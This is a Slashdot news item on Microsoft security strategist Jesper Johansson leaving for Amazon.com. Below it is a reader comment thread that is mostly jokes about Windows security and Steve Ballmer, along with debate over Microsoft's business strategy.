Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

MS Security Guru Leaves for Amazon.com

Zonk posted more than 8 years ago | from the leaving-is-hard-to-do dept.

103

Rocky Mann writes "Jesper Johansson, a security guru for Microsoft, is leaving the company to join Amazon.com. Johansson served for some five years as a 'senior security strategist', and is considered one of the world's leading experts on how to protect installations of Windows." From the article: "Johansson is also an advocate for the use of safe-passwords techniques in the enterprise. At the height of the WMF zero-day attacks earlier in 2006, Johansson offered measured advice on the use of unofficial patches and he was constantly on the move, traveling around the world to help customers figure out how to use Microsoft's products securely."

cancel ×

103 comments

Sorry! There are no comments related to the filter you selected.

Great Quote (4, Insightful)

gooman (709147) | more than 8 years ago | (#15807468)

...he was constantly on the move, traveling around the world to help customers figure out how to use Microsoft's products securely.

Kind of says it all doesn't it.

Re:Great Quote (1)

donaggie03 (769758) | more than 8 years ago | (#15807527)

So there's this word that basically means "a phrase using words that are opposites or otherwise incompatible." I can't think of what that word is at the moment, but I think Microsoft Security would be a good example of that. The end.

Re:Great Quote (0)

Anonymous Coward | more than 8 years ago | (#15807545)

oxymoron

I think you mean otherwise compatible

Re:Great Quote (1)

ShieldW0lf (601553) | more than 8 years ago | (#15807555)

Johansson served for some five years as a 'senior security strategist'

He's #1 in securing windows machines. He carries very sharp scissors in his back pocket.

Re:Great Quote (1)

Skevin (16048) | more than 8 years ago | (#15807793)

An oxymoron.

Solomon Chang

Re:Great Quote (0)

Anonymous Coward | more than 8 years ago | (#15807562)

how: Buy sco 'licences' ? or the Darl tax ?

Re:Great Quote (0)

Anonymous Coward | more than 8 years ago | (#15807804)

It's amazing how well this makes it sound like the issues were the user's fault. Please, when you mess up, at least accept responsibility.

Re:Great Quote (1)

LinuxGeek (6139) | more than 8 years ago | (#15808072)

Yeah, I imagine that he has accumulated enough frequent flyer miles to actually leave the Milky Way.

Re:Great Quote (1)

Shag (3737) | more than 8 years ago | (#15809728)

...he was constantly on the move, traveling around the world to help customers figure out how to use Microsoft's products securely.

Sisyphus had it easy in comparison to that.

Steve Ballmer (5, Funny)

Yvan256 (722131) | more than 8 years ago | (#15807473)

At some point in the conversation Mr. Ballmer said: "Just tell me it's not Amazon." I told him it was Amazon.

At that point, Mr. Ballmer picked up a chair and threw it across the room hitting a table in his office. Mr. Ballmer then said: "I'm going to fucking bury that company, I have done it before, and I will do it again. I'm going to fucking kill Amazon."

Thereafter, Mr. Ballmer resumed trying to persuade me to stay....Among other things, Mr. Ballmer told me that "Amazon is not a real company. It's a library."

Re:Steve Ballmer (2, Funny)

moria (829831) | more than 8 years ago | (#15809792)

Is the Ballmer the Chairman?

Re:Steve Ballmer (0)

Anonymous Coward | more than 8 years ago | (#15811098)

Well, if he had any chairs left, he might have been.

Why are people who leave microsoft relevent news? (4, Insightful)

Anonymous Coward | more than 8 years ago | (#15807482)

I can see how Scoble and Gates leaving MS should make slashdot, but this is just random fluff. Slashdot loves reporting that (not really) important people are leaving Microsoft for Google, or apparently Amazon.

Do we get to also see the random people who leave Google and Amazon.com? Mod me down if you like, but I don't really see how this is relevent news.

Re:Why are people who leave microsoft relevent new (-1, Offtopic)

mustafap (452510) | more than 8 years ago | (#15807494)

>Mod me down if you like,

Modded down. Thanks for asking.

Re:Why are people who leave microsoft relevent new (2, Insightful)

justsomebody (525308) | more than 8 years ago | (#15807540)

You only have three options:
- you think you've entred some SeriousGeekSanctuary.com??? You suddenly realize "it is a /.". God, that would be a red pill for you
- feed your kitten and pretend nothing happened, go to sleep and hope it will go away. No pill and you wake up hungry, while /. still exists in its current form in the morning
- go with the rest of us and take the /. blue pill, code for nothing and post bull for the rest of the day

But here it is "IT IS A SLASHDOT, WHADA'YA EXPECT???"

p.s. since you were agreeing with being modded down, your wish come true. I on the other hand agree on being modded up.

Re:Why are people who leave microsoft relevent new (1)

tomstdenis (446163) | more than 8 years ago | (#15807556)

Microsofts Demise: See Titanic.
Titanic: 2nd worst civilian disaster next to the demise of Microsoft.

Tom

Re:Why are people who leave microsoft relevent new (1)

Stormwatch (703920) | more than 8 years ago | (#15807603)

Titanic: 2nd worst civilian disaster next to Microsoft.
There, I fixed it for you.

Breaking News (3, Interesting)

quokkapox (847798) | more than 8 years ago | (#15807598)

Any tech guru leaving Google, Yahoo!, Amazon, YouTube, or any other innovative company, to go work for Microsoft, *would* be breaking news. Hate to say it, but it ain't happenin'. Somebody, prove me wrong.

Re:Breaking News (4, Informative)

EvanED (569694) | more than 8 years ago | (#15807910)

Does the Sysinternals guy count?

Re:Breaking News (1)

KwKSilver (857599) | more than 8 years ago | (#15808004)

His company got swallowed whole by MS. Too, bad I rather trusted it. Not now, though.

Re:Breaking News (1)

EvanED (569694) | more than 8 years ago | (#15808121)

I have a friend at MS now as an intern who actually loves the Sysinternals tools who says the developers there won't let MS do anything to kill them. So don't despair quite yet.

Re:Breaking News (1)

Jah-Wren Ryel (80510) | more than 8 years ago | (#15808269)

Sounds just like what Ben & Jerry were saying right after they were bought out by Unilever.

Re:Why are people who leave microsoft relevent new (1)

cmacb (547347) | more than 8 years ago | (#15808801)

"Mod me down if you like, but I don't really see how this is relevent news."

It was news to me that Microsoft even HAD a "security strategist".

I wonder what he did all day. Review the 10 year backlog of e-mail warning that active scripting might be a gaping security hole?

Re:Why are people who leave microsoft relevent new (1)

someone1234 (830754) | more than 8 years ago | (#15810501)

By your logic, anyone leaving M$ is unimportant. Maybe they even cease to exist.

Re:Why are people who leave microsoft relevent new (0)

Anonymous Coward | more than 8 years ago | (#15813555)

It's news to me.
I can't stand it when people act like they were forced to read a news article. Even worse, that they act like they were forced to waste their time commenting on it.
GET A LIFE

And let me guess.... (3, Funny)

LittleBigScript (618162) | more than 8 years ago | (#15807489)

...he signed a Non-Compete Agreement with Microsoft so he's working as front door security.

Re:And let me guess.... (0)

Anonymous Coward | more than 8 years ago | (#15809118)

noncompetes generally aren't enforced in washington state, so it's probably not a big deal.

Re:And let me guess.... (0)

Anonymous Coward | more than 8 years ago | (#15809298)

Washington state is limiting your right to contract? I would be outraged!

(there are two ways to look at everything ... and in this case, not enforcing non-compete agreements would be a really really bad idea, and probably not at all the reality)

Could be. (1)

twitter (104583) | more than 8 years ago | (#15809299)

... he signed a Non-Compete Agreement with Microsoft so he's working as front door security.

If so, I'll bet he's looking forward to a job that's possible.

Re:And let me guess.... (1)

Geminii (954348) | more than 8 years ago | (#15810133)

Dunno, from the quoted text it sounds like that's what he was doing at Microsoft...

Amazon? (4, Funny)

justsomebody (525308) | more than 8 years ago | (#15807495)

Thanks god it is not Google. MS chairs will probably thank him publically.

Re:Amazon? (4, Funny)

jrumney (197329) | more than 8 years ago | (#15807613)

Thanks god it is not Google. MS chairs will probably thank him publically.

MS bookcases on the other hand, are quivering in fear.

Yikes! Time to close... (4, Funny)

dpbsmith (263124) | more than 8 years ago | (#15807496)

...my Amazon account.

Re:Yikes! Time to close... (1)

MillionthMonkey (240664) | more than 8 years ago | (#15807543)

I can't wait to change my password to the empty string! Who can remember those things!

Must be... (2, Funny)

Shook18 (878947) | more than 8 years ago | (#15807511)

the smartest man alive! "...and is considered one of the world's leading experts on how to protect installations of Windows."

Re:Must be... (2, Funny)

MooseByte (751829) | more than 8 years ago | (#15807640)

I swear when I first read that, I parsed it as "one of the world's leading experts on how to protect installations from Windows."

And it still made perfect sense (codebase problems and all).

So? (0)

Anonymous Coward | more than 8 years ago | (#15807519)

Microsoft has quite a few Gurus.. is there a reason that this one guy is news?

MS Security? (0, Troll)

Anonymous Coward | more than 8 years ago | (#15807522)

Isn't that an oxmoron... kinda like military intelligence?

Re:MS Security? (1)

crashelite (882844) | more than 8 years ago | (#15807619)

to top it off he is a guru too... damn didnt know ms had either of them... last time i checked... hold on gotta use my dictonary... "(in Hinduism and Buddhism) a spiritual teacher, esp. one who imparts initiation." humm MS campus has hazing? i thought that was againt campus rules... oh well that must be why he is going to amazon... they dont have a campus... he can impart in initiations all he wants.

Re:MS Security? (2, Insightful)

bcat24 (914105) | more than 8 years ago | (#15807621)

Or worse, "insightful Slashdot post". *ducks*

Re:MS Security? (1)

EvanED (569694) | more than 8 years ago | (#15807900)

Someone needs to mod the parent insightful, just to be ironic.

Re:MS Security? (0)

Anonymous Coward | more than 8 years ago | (#15809042)

And it actually happened. LOL, this is why I love Slashdot.

Like the chastity expert at the chicken ranch! (1)

BroncoInCalifornia (605476) | more than 8 years ago | (#15808803)

I did not know Microsoft had a security expert!

Re:Like the chastity expert at the chicken ranch! (1)

Geminii (954348) | more than 8 years ago | (#15810148)

Well someone there had to prevent anyone else reading books on security. It's s full-time job!

Wait, I know this one... (0, Troll)

AlXtreme (223728) | more than 8 years ago | (#15807524)

...to help customers figure out how to use Microsoft's products securely.
By keeping their computers switched off?

Thank you, thank you. I'll be here all night, please tip the waiter...

Re:Wait, I know this one... (-1)

Anonymous Coward | more than 8 years ago | (#15807584)

*throws fruit*

"You suck, faggot!"

Re:Wait, I know this one... (0)

Anonymous Coward | more than 8 years ago | (#15808207)

Didn't deserve the troll mod. Guess they wanted a chair joke.

omg sooo funny (1, Redundant)

atarione (601740) | more than 8 years ago | (#15807530)

chair jokes? still funny after what 2yrs I do not not remember?

Non Compete jokes oh man hold on let me get my pills your killing me.

and a bunch of "secure windows" isn't that an oxymoron jokes...

no really it is very funny.

Re:omg sooo funny (1)

Reverend528 (585549) | more than 8 years ago | (#15808045)

things to do: 1.read slashdot..done 2.????? 3. Profits

Please impart your wisdom on us, he who has mastered the art of comedy.

If those jokes really bother you... (0)

Anonymous Coward | more than 8 years ago | (#15808154)

...you must be new here ;)

I met this guy (4, Interesting)

DnemoniX (31461) | more than 8 years ago | (#15807535)

I attended a small security lecture with about 25 people, he was the presenter. He walked through some real time hacks against Microsoft products that he had running in VPC. Nothig to stunning for me, but most of the people there had no clue about security so they were all blown away. I didn't see anything special. One thing of note that amused me, was the bumper sticker on his laptop that read "My other box is your Linux box". I said that I couldn't fit "My other box is a 10,000 node zombie cluster of Windows machines" on a bumper sticker....he chuckled...

If you run his name on Amazon you will find his book, which is really very good if you are a Windows Server Admin and are new to the security game.

Re:I met this guy (1)

Yvan256 (722131) | more than 8 years ago | (#15807547)

"My other box is a 10,000 node zombie cluster of Windows machines"

Good one, I wonder if ThinkGeek would make such bumper stickers...

My poor experience with JJ talks (1)

muzzmac (554127) | more than 8 years ago | (#15809016)

I went to Jesper's presentation at Auscert in 2005 where he came out with the stunning "write down your passwords" revelation. (Previously espoused by Bruce Schneier years ago.)

His talk was an hour of how to jam as many funny pictures into a talk and attempt to get "in" with the geek crowd by poking fun at the security establishment.

It was kind pathetic.

He then went on to attend a Thor Larholm presentation and attack Thor at the end of it. It was stupid and untidy. I thought Thor handled it well. Jesper lost all respect from me @ that point.

BTW the attack was basically Thor going through some old .JPG processing vulnerability in windows and examining it. He stated at one point this can't have been reviewed as a very basic buffer overflow was missed.

Jesper then piped up and stated it was reviewed "because I reviewed it." Blah blah blah.

Jesper and another MS Security manager (I think there are about 700 managers personally responsible for security @ Microsoft.) continued the attack making themselves look rather silly and Thor look very balanced and well mannered.

Cocky for such a loser record. (1)

twitter (104583) | more than 8 years ago | (#15809290)

"My other box is your Linux box"

That's a stupid thing for him to say. It shows his malicious intentions and his failure to carry through.

80% of the world's spam comes from security problems in his platform. This guy's work is either incompetent or hampered by others. Blaming it on his users is not good enough while Mac, Linux and Sun users are blissfully unaware of the Windoze swamp.

To date there are no such problems with free software, no worms, no trojans, ad servers, nothing, naada, zip. Sure, that dick might be able to root my particular box if he tried hard enough. So what? I can clean it up in twenty minutes and I've got enough redundancy and back ups to not even notice. Unlike the pay per play Windoze world, I can have live backups on multiple machines without losing my shirt.

All that silly bumper sticker shows is his intent to break something that works better than M$ junk. So far all effort in that direction have failed. Banks, search engines and other high profile chair targets continue working as usual, unless some M$ net storm messes things up.

I said that I couldn't fit "My other box is a 10,000 node zombie cluster of Windows machines" on a bumper sticker....he chuckled...

He was probably thinking, "My Windows bot net is bigger than yours. "

Re:Cocky for such a loser record. (0)

Anonymous Coward | more than 8 years ago | (#15809457)

http://slashdot.org/comments.pl?sid=88413&cid=7656 803 [slashdot.org]
http://slashdot.org/comments.pl?sid=77588&cid=6896 690 [slashdot.org]
http://slashdot.org/comments.pl?sid=73226&cid=6595 921 [slashdot.org]
http://slashdot.org/comments.pl?sid=71864&cid=6492 229 [slashdot.org]
http://slashdot.org/comments.pl?sid=69025&cid=6312 196 [slashdot.org]
http://slashdot.org/comments.pl?sid=49657&cid=5011 656 [slashdot.org]
http://slashdot.org/comments.pl?sid=180946&thresho ld=1&cid=14972959 [slashdot.org]
http://slashdot.org/comments.pl?sid=129735&thresho ld=5&cid=10823036 [slashdot.org]
http://slashdot.org/comments.pl?sid=112229&cid=952 1025&threshold=5 [slashdot.org]
http://slashdot.org/comments.pl?sid=137420&cid=114 89094&threshold=5 [slashdot.org]
http://slashdot.org/comments.pl?sid=155076&cid=130 11391&threshold=5 [slashdot.org]
http://slashdot.org/comments.pl?sid=113493&thresho ld=5&cid=9614809 [slashdot.org]
http://slashdot.org/comments.pl?sid=164775&cid=137 51004 [slashdot.org]
http://slashdot.org/comments.pl?sid=126301&thresho ld=5&cid=10572437 [slashdot.org]
http://slashdot.org/comments.pl?sid=119108&thresho ld=5&cid=10056927 [slashdot.org]
http://slashdot.org/comments.pl?sid=135403&cid=112 99129&threshold=5 [slashdot.org]
http://slashdot.org/comments.pl?sid=136181&thresho ld=5&cid=11374447 [slashdot.org]
http://slashdot.org/comments.pl?sid=134005&thresho ld=5&cid=11203454 [slashdot.org]
http://slashdot.org/comments.pl?sid=159878&thresho ld=0&cid=13384602 [slashdot.org]
http://slashdot.org/comments.pl?sid=166661&cid=138 99128&threshold=2 [slashdot.org]
http://slashdot.org/comments.pl?sid=168164&cid=140 19967 [slashdot.org]
http://slashdot.org/comments.pl?sid=168163&cid=140 20030&threshold=5 [slashdot.org]
http://slashdot.org/comments.pl?sid=172399&thresho ld=1&cid=14355804 [slashdot.org]
http://slashdot.org/comments.pl?sid=172869&cid=143 89115&threshold=5 [slashdot.org]
http://slashdot.org/comments.pl?sid=175800&cid=146 12128&threshold=5 [slashdot.org]
http://slashdot.org/comments.pl?sid=153489&thresho ld=-1&cid=12876883 [slashdot.org]
http://slashdot.org/comments.pl?sid=118246&cid=999 7235&threshold=5 [slashdot.org]
http://slashdot.org/comments.pl?sid=100963&cid=863 3073&threshold=5 [slashdot.org]
http://slashdot.org/comments.pl?sid=182119&cid=150 55046 [slashdot.org]
http://slashdot.org/comments.pl?sid=112831&thresho ld=5&cid=9567128 [slashdot.org]
http://slashdot.org/comments.pl?sid=108477&cid=922 6590&threshold=5 [slashdot.org]
http://slashdot.org/comments.pl?sid=93270&cid=8010 985&threshold=4 [slashdot.org]
http://slashdot.org/comments.pl?sid=94140&cid=8079 321 [slashdot.org]
http://slashdot.org/comments.pl?sid=88645&cid=7676 279&threshold=5 [slashdot.org]
http://slashdot.org/comments.pl?sid=116521&thresho ld=5&cid=9861962 [slashdot.org]

Re:I met this guy (0)

Anonymous Coward | more than 8 years ago | (#15810723)

I attended that same security lecture, and Jesper was the one guy who added nothing of real value. I couldn't help thinking that,

- a) he was a complete egomaniac, who loved nothing more than to hear himself talk, and he really did think he was the bomb;

- b) he was a complete dick, and for being a supposed professional, was completely low-class, hurling insults and such to try and impress us;

- c) very typical Microsoft... didn't know the facts, didn't know technology, didn't understand that the Linux and BSD systems of the world have such a better track record than what he was telling us, didn't have a clue about anything not invented by Microsoft.

In a Q/A session at the end of that summit, I asked Jesper why a systems administrator would want to use 100% Microsoft systems, essentially why would anyone rely on a "homogenous" environment, and put all their eggs in one basket, security-wise. (Referring to the study about heterogenous environments being more secure.)

His answer was about how much easier it was to administer servers if they were all Windows. Huh? Since when is "easy to administer" have anything to do with security? (Oh right, in Windows-land it does.)

I followed up that reply with the comment that the studies were not about systems being easy to administer but were about reducing the number of and the effect of 0-day sploits since a heterogenous system would use a variety of OS's. He continued on, twisting facts, twisting truth, and eventually made it sound as if it was the Systems Administrators that introduced all the world's security holes, and that if Microsoft could just introduce yet another control panel, and everyone would use it, then all the Windows server would be secure. HAHAHAHAHAHAHHAAHAHA I still laugh out loud thinking about his ignorance about this.

I love how Microsoft produces products with so many buffer overflows and protocols with gaping holes in it, and then blames the customer's system administrators because the systems weren't locked down.

Like I said, he's typical Microsoft, arrogant and stupidly factually incorrect.

One Liners (1, Interesting)

Anonymous Coward | more than 8 years ago | (#15807542)

Just moving from one marketing gig to another.

He was done securing vista and there just wasn't anything challenging left at Microsoft for him to work on.

He's moving to Amazon to implement Trustworthy One-Clicking(TM).

His real reason for leaving: he's looking for the one, the only one that's build like an Amazon...and he doesn't want people to buy their books from a brick house.

Hey, does Amazon sell office chairs?

Re:One Liners (1)

Effugas (2378) | more than 8 years ago | (#15807770)

OK, Trustworthy One-Clicking is probably the funniest concept I've seen in a while. AC FTW.

Re:One Liners (1)

Incoherent07 (695470) | more than 8 years ago | (#15807868)

Hey, does Amazon sell office chairs?

Yes. [amazon.com]

Well... (1)

TouchOfRed (785130) | more than 8 years ago | (#15807546)

I guess when you've thrown enough money at the problem and it still hasnt been solved, the next logical thing would be chairs. Either that or developers.

maybe this is just me (1, Interesting)

Anonymous Coward | more than 8 years ago | (#15807566)

but it seems that while rotecting Amazon's internal network, along with the protocol to customers (which presumably uses SSL), is admittedly a huge task, one can rely heavily on firewalls, server configurations, protocols, and physical security policies that can be standardized throughout the company.

While the ongoing task of securing hundreds of millions of desktops and servers owned and operated at customer sites is orders of magnitude more formidable. Maybe he didn't want to be around when the Vista hit the fan?

If I were Ballmer (1)

mnmn (145599) | more than 8 years ago | (#15807575)

If I were Ballmer I would try to hire Theo de Raadt to replace him.

And if I were de Raadt, I'd reject the offer unless Microsoft opensources win32.

And if I were the customer I would not buy Windows at all.

Oh wait...

Re:If I were Ballmer (0)

Anonymous Coward | more than 8 years ago | (#15807630)

I've worked with Theo, and I've worked with JesperJo. Trust me, Jesper has it all over Theo. Not to mention the fact that Jesper doesn't provoke violence.

MS Security Guru Leaves for Amazon.com (0)

Rik Sweeney (471717) | more than 8 years ago | (#15807607)

Bad luck Amazon!

Any other M$ joke cliches? (3, Funny)

kimvette (919543) | more than 8 years ago | (#15807612)

Cliche M$ humor attempt #1:

(#1a)
Amazon? Amazon? WTF?

I can imagine it now:

Some random M$: Exect #1

Amazon has enjoyed a moderate amount of success, therefore online book, CD, and video sales is obviously Microsoft's space. How dare they take food off of Microsoft's table by doing business in an industry kinda-sorta-maybe related to anything we at Microsoft do? And what the hell, now they're stealing our talent to do it? We own that space, we're in that space (maybe. somehow, in a future. Maybe we'll buy them out! Hey wait a second, we have a division called Microsoft Press, don't we? I think we can sue Mr. Johansson and put a stop to our competitors' stealing our employee!

Ballmer:

I'm going to F***ING KILL AMAZON! I'LL KILL THEM AND BURY THEM! I've done it before!
(meanwhile, Microsoft's new AI-equipped motorized chairs, which have been provided due to Ballmer's costing the company millions in damaged chairs and the need to avoid these recurring losses, detect Ballmer's impending annurism quickly roll out of the room)

(#1b)Bill Gates:

Meh. I've had my day of being a right ass. I couldn't be bothered being a hater any more. Besides, I'm quitting soon. *donates another $10bil to save the children to appease conscience*

Cliche M$ humor attempt #2:

A Microsoft Security expert? You mean, HE'S the reason Microsoft Windows is so "secure?"
Just what the hell is Amazon thinking?

(I kid, on both counts)

Re:Any other M$ joke cliches? (1)

Ohreally_factor (593551) | more than 8 years ago | (#15808174)

Dear Diary,

Finally, I'm leaving this stinking company for another where I might have a chance to actually use my expertise, instead of flying all over creation putting on dog-and-pony shows and doing damage control! I feel like a rat fleeing a sinking ship, but if the Chief Rat has scurried off, why should I feel any remorse? Besides, I was almost hit by a chair two weeks ago. Enough is enough!

Yours truly,

Jesper

Re:Any other M$ joke cliches? (1)

kimvette (919543) | more than 8 years ago | (#15808259)

before some typist-nazi calls me on it:

s/exect/exec/
s/annurism quickly/annurism and quickly/

Beet u 2 it, so their!
Oops, they're I go again, er, I mean, oops, I did it again!

Beat ya to it typo nazis, so there! ;)

Microsoft is under a major crisis. (4, Insightful)

Marcos Eliziario (969923) | more than 8 years ago | (#15807615)

Microsoft no longer has a coherent vision or a clear strategy. They waste their time trying to attack on several fronts, and in the meantime, their core is abandoned. Vista could have been a technological brakthrough, but they let this opportunity slip. Instead of trying to innovate, they try to emulate others and have been failing miserably. In the past, if only rumor about Microsoft developing a MsPod emerged, this would have a clear effect on Apple stocks. Nowadays, they can formally anounce they are working in it and people will only nod their heads, because they are increasingly losing credibility. They spent millions with IE, had sucessive legal problems because of it, not to mention the security problems, and still they can't face the fact that they could profit from internet making their OS better. Cisco makes money selling routers, why microsoft can't see that they can profit from the internet by having a rock solid, fast and easy-to-use OS? Why do they think that they need to "kill" google, or "kill" iPOd on their own arenas to survive? Instead they should have invested all this money making their core businness stronger, by making their OS the best OS for developers and user alike, by making people "wanting" to use Windows instead of people "Having" to run windows. After that they could even afford the luxury of competing with the iPod or with Google, but not the way they are doing now.

Re:Microsoft is under a major crisis. (1)

Marcos Eliziario (969923) | more than 8 years ago | (#15807644)

(I've forgotten to finish my argument on the last post. Sorry.) So, my point is that all those departures are a clear signal of that crises. Surely they are not leaving because of the money, but they are leaving because they had enough of that crisis and they clearly see where the company is heading, and they don't like what they see.

Re:Microsoft is under a major crisis. (2, Insightful)

Decaff (42676) | more than 8 years ago | (#15807679)

Microsoft no longer has a coherent vision or a clear strategy. They waste their time trying to attack on several fronts, and in the meantime, their core is abandoned

I have been using Microsoft products since the 70s. Have they ever had a core or coherent IT strategy?

As far as I can tell, their strategy is purely business-based. It is to make popular products with as little effort on secondary issues (such as security) as possible. They have been focussing on security in recent years not because of any core belief, but because lack of it was starting to seriously threaten sales. All of their products have involved operating system tie-ins since the start. It is a perfectly reasonably sales model (except for when it is used illegally, as with the monopoly issue).

Microsoft has a clear strategy, but if you are looking for it in terms of IT you are looking in the wrong place.

Re:Microsoft is under a major crisis. (2, Insightful)

Marcos Eliziario (969923) | more than 8 years ago | (#15807745)

No. I mean in terms of businness itself. Business is about generating money from the resources you have in the best way you can, and also, this has to be sustainable over time and has to generate more value for the money than other options, or at least give your stakeholders that impression. Do you know the kind of guy/girl that is intelligent, creative, but never finishes what he/starts? Microsoft looks just like that guy. They start a lot of initiatives, make up grandious strategies (do you remember when everything has .NET in his name, now it's time for "Windows Live";-) but they clearly lack the details and soon reality forces them to step back, and all the money they spent is lost forever. They are in it for the money, of course, and that's right, but looks like they don't really now how to invest their money, they look like a Third World dictatorship that after the discovery of vast reserves of Oil in their subsoil, start building giant stadiums, try to build nuclear bombs and waste all the newly gained money with useless things for their people, just because they never had a coherent and intelligent vision of how to work with all that money. Microsoft has been spoiled by market analysts that dumbly appraised every stupid move of them, just because that analysts thought that Microsoft could never get wrong. This has diminished their ability to think strategically, and all the money they had just made it worse for the dissident voices to be heard. They got intoxicated with their success, and what we see now is just the result of it.

Re:Microsoft is under a major crisis. (2, Insightful)

Decaff (42676) | more than 8 years ago | (#15807834)

I think you have written a very good summary, but I think you have missed something. The reason why this seems to be starting to fail is because the computing industry (at least the area where they are trying to make money) has stopped growing and changing as rapidly as it used to. These are not the early days of the PC or Windows when users are impressed by each new product. People are used to Windows, and no amount of publicity for Vista will change the fact that it is yet another version of the same old product. I would also imagine that Microsoft expected 5 or 6GHz processors around now to back up their new releases. Microsoft has previously had new markets to expand into, but now they are penned in. Their server sales market share has been stagnant for years, and a large number of Microsoft servers run... Java! Same with the mobile phone OS market. Attempts to use their desktop presence to expand into other markets have proved illegal. All around them, smaller companies are innovating. Microsoft have riden on the coat-tails of an exponentally growing hardware market with ever-increasing processor speeds. Now that those markets are slowing, Microsoft seems to be finding it hard to adapt.

Thank you. (1)

Futurepower(R) (558542) | more than 8 years ago | (#15808364)

Thanks for your excellent discussion of the issues

Re:Microsoft is under a major crisis. (1)

Marcos Eliziario (969923) | more than 8 years ago | (#15809506)

I see your point, and I agree with it also, but I still think this a part of the problem, and not the whole explanation. Surely the market has changed and things are different now from what they were some years ago. But, why their response is so blind and erratic?
And that's where I think that my theory fits in.
For a comparison, look at Apple. Instead of trying to be everywhere, everytime, they tried to do some few things well done. Instead of trying to compete with google, or yahoo, or whatever, they instead opted to fill a niche and to leverage their products. Look at iTMS and iPod, simple products, easy ideas, and a incremental approach, first music, then videos... What Microsoft would have done instead: Probably they would have a "vision" for digital media, overwhelming complex and extremely ambitious, that would cost a lot of money, and if they did a mistake, well... their new initiative would be tanted forever.
There are very interesting things being done at Microsoft, things like the work with Software Factories, the innovations in C# 3.0. Surely, development tools are not even profitable for microsoft, but they have some fine brains working in it.
Do you know what is the problem? The idea that every company should concentrate its efforts on its weakness, instead of concentrating on its strong points. This is the recipe for failure.
Apple has seen its rebirth doing exactly the opposite. At a point where there several doubts if Apple would be able to survive, they turned the table by concentrating their efforts where they were clearly good. Having no much money surely helped them to have a so straightforward vision, because they could not afford to lose.
Can you see, Microsoft has been wasting money trying to control the web, because someone told them that if they did it not, they would be swallowed. Some years later, is apple, who never seemed to care so much about the internet, that have a landmark online business with iTMS.
Microsoft should go more simple, take smaller steps and adopt incremental approachs to new business. Think about like some kind of XP translated to business, something like eXtreme Management. Small steps, tests, listen to the feedback from customers and avoid by all means that stupid big upfront business strategy design. If they don't change, the smart guys will keep abandoning the ship.

Re:Microsoft is under a major crisis. (1)

Decaff (42676) | more than 8 years ago | (#15809671)

Microsoft should go more simple, take smaller steps and adopt incremental approachs to new business.

I think one of the problems with Microsoft is that they often do adopt incremental approaches, but in the wrong areas. I remember in the 90s (and even in the late 80s) waiting for Microsoft to produce a robust multi-tasking desktop operating system. It was so concerned about absolute backward compatibility that they held back, and did things very slowly and took decades to do this. On the other hand, they take risky steps where they need not. They have abandoned a huge community of developers by making .NET incompatible with VB6, but there was not much point in having a VM-based system like .NET unless you were going to provide portability, which .NET is not. They can innovate all they like with .NET, but as anyone who has used MS products for some time can tell you, there is no guarantee that they won't drop .NET in a few years in response to some new marketing strategy.

So, you are right - they seem to have an unplanned, incoherent, scatter-gun approach. Up till now, the occasional idea has worked, and they have managed to quickly change direction when it hasn't (as with OS/2 and Windows).

Re:Microsoft is under a major crisis. (1)

TaoPhoenix (980487) | more than 8 years ago | (#15809706)

Some good analysis here. I shall try to add some snips.

Microsoft *did* succeed in controlling the web - so well in fact, that all the Monopoly issues arose. The court cases discussed the near-monopoly of Windows itself. I am having trouble recalling the final results, but I think the effect was that Microsoft barely stayed within legal limits purely on the OS side, and only got in trouble with Bundling.

Paul Thurrott's little WGA escapade aside, I do rely on him to explain the fundamentals, and he did slip in a truly scary warning about Vista. (paraphrased) "Because of the inertia of decades of sloppy programming for windows, suddenly when programs are no longer able to write where they want, this will break thousands of programs". If this is really true, it *would* be the second of three strikes to seriously cripple Microsoft.

What exactly would happen if Microsoft completely went nova? Would there be the world's biggest renaissance of IT to switch the entire business world over? Unlike the Airline Bailouts, Microsoft already has large (illegal) amounts of money. If Vista tanks, after we all watch Return of the Jedi, the social effects would be nearly incalculable. (All for good ends, but a bumpy ride.)

Trying to read between the lines, the specs I see on Vista are "it does nothing well except MAYBE security". So this is a Slashdot story, because the Senior Security Strategist is leaving (I'm sure he had a job: "what the #$%^#$% do I do with legacy code? Which of three user bases do I want to royally piss off?) (Do the math: 'FIVE years'. That means he arrived post-XP ... and didn't see the completion of Vista. And I forget who, there's a lead product designer who is also retring promptly upon the release of Vista.) Is there any chance they abused him so badly he said : "Oh yeah? I dare you to try to finish out a Beta that our lead reviewer says not to install!". Is it possible that by doing his part to BrainDrain Microsoft, he is expressing discontent? "Vista, the Security Version of Windows, without the Senior Security chief. I dare you to fix that glitch when ...."

--TaoPhoenix

Re:Microsoft is under a major crisis. (1)

Marcos Eliziario (969923) | more than 8 years ago | (#15809746)

Good point. Do you think that all those defections are the external sympthom of Vista having turned into a Death March Project [Yourdon]? After reading your comment this was the first thing that came to my mind.

Re:Microsoft is under a major crisis. (1)

TaoPhoenix (980487) | more than 8 years ago | (#15810680)

I do not know. I consider myself warned, and am content to let actual dramas unfold in seven months.

Re:Microsoft is under a major crisis. (1)

TheSunborn (68004) | more than 8 years ago | (#15810837)

But Microsoft don't controll the web at all. They don't run the majority of webservers or mail servers.

They do make the most used webbrowser, but they can't really use that for anything anymore. I have not seen an "internet explorer only" website on the public internet, within the last 12 months.

And having internet explorer, does not help them sell other producs. IIS for example is just as good(ore bad) whenever the client are using, internet explorer, mozilla, firefox or seamnokey.

Now just sit back and watch... (2, Insightful)

Rodness (168429) | more than 8 years ago | (#15807625)

... as Amazon gets pwned for being completely insecure.

Honestly, I don't understand why people we've never heard of defecting from Microsoft is newsworthy anymore.

Open Season (1)

MECC (8478) | more than 8 years ago | (#15807629)

Looks like open season on Amazon...

Mom to Jesper: Don't run w/ scissors! (1)

10am-bedtime (11106) | more than 8 years ago | (#15807671)

Jesper to Mom: It's part of my job, Mom. I fly first class, snip people's ethernet cable, and they pay me well...

Amazon to Jesper: ...(so far).

BLOG: Im finally switching to Linux ....... (1, Interesting)

Anonymous Coward | more than 8 years ago | (#15807767)

AMAZON is 94% UNIX/LINUX shop

New Amazon slogan (1)

Frightening (976489) | more than 8 years ago | (#15807794)

AMAZON: Where groceries are better than Vista

Meh, who cares (1)

Gumber (17306) | more than 8 years ago | (#15807906)

I remember this guy, I ridiculed him heartily in my blog after he bitched about the way non-Microsoft people handled the WMF exploit.

